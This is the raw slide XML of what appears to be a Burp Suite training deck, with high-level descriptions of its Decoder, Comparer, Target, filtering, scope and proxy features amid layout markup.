                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Decodes various types of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>encoding for textual</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Comparer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Compares two pages together, implementing a form of "diff"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67588" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:lum bright="-12000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3402013" y="1905000"/>
            <a:ext cx="5741987" cy="419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7589" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="5992813" y="4876800"/>
            <a:ext cx="990600" cy="73818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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-2286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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Raw HTTP request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67590" name="Left Arrow 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1830157">
            <a:off x="5297488" y="4741863"/>
            <a:ext cx="796925" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67591" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="7974013" y="2743200"/>
            <a:ext cx="990600" cy="52387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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-2286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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Tabs to use each tool</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67592" name="Left Arrow 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1830157">
            <a:off x="7278688" y="2455863"/>
            <a:ext cx="796925" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>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Burp Target</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1021080"/>
            <a:ext cx="4495800" cy="4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>The target maintains the state within Burp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Most of your mapping time is spent here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>It displays everything seen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Depending on filteri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>ng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>This tab allows the tester to examine the traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>It also displays links seen but not visited</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495800" y="1752600"/>
            <a:ext cx="4495800" cy="4191000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22783007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622"/>
            <a:ext cx="8229600" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Filtering</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3255645"/>
            <a:ext cx="8077200" cy="2209800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Filtering controls display</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The information is still within Burp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>This screen provides a number of options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Filtering can be done via everything from mime type to a regex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The defaults are pretty good but hide 4XX codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>This prevents us from seeing incorrect links or brute force attempts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="893259"/>
            <a:ext cx="7940040" cy="2445521"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="6934200" y="2791361"/>
            <a:ext cx="1828800" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Filtering makes dealing with large targets easier!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18306483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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="30480" y="1165334"/>
            <a:ext cx="4572000" cy="4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Scope controls the automated features of Burp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>And some other minor functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Scope uses basic regular expressions for matching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>^ for the beginning and $ for the end as simple examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The automated tools can be set to only run against in-scope items</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Items such as search and save have the option to respect scope</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4602480" y="1676400"/>
            <a:ext cx="4404806" cy="2921000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="ltGray">
          <a:xfrm>
            <a:off x="6019800" y="4724400"/>
            <a:ext cx="1828800" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Scope is useful mainly for automated features!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20735549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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Burp Proxy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68611" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365760" y="1457325"/>
            <a:ext cx="4876800" cy="4648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Very similar to other proxies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Its integration with the rest of the Burp Suite is its main purpose</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>The proxy is the entry point for the entire tool set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Includes fine-grained rules to determine which requests/responses are intercepted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>These reduce the number of requests we respond too</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Proxy can also automatically rewrite HTML</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Can be used to remove client side filtering or input limits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="68612" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:lum bright="-12000" contrast="8000"/>
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5041900" y="1905000"/>
            <a:ext cx="4102100" cy="320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8613" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="7162800" y="2286000"/>
            <a:ext cx="1143000" cy="52387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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-2286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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Interception Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68614" name="Left Arrow 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1830157">
            <a:off x="6543675" y="2532063"/>
            <a:ext cx="796925" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50091"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900"/>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68615" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="6096000" y="4114800"/>
            <a:ext cx="1143000" cy="30797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600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600">
              <a:defRPr sz="3600">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
                <a:cs typeface="MS PGothic" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2514600" indent="-2286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pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Times New Roman" charset="0"/>
                <a:cs typeface="Times New Roman" charset="0"/>
              </a:rPr>
              <a:t>Raw Request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68616" name="Left Arrow 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1830157">
            <a:off x="5781675" y="3598863"/>
            <a:ext cx="796925" cy="479425"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
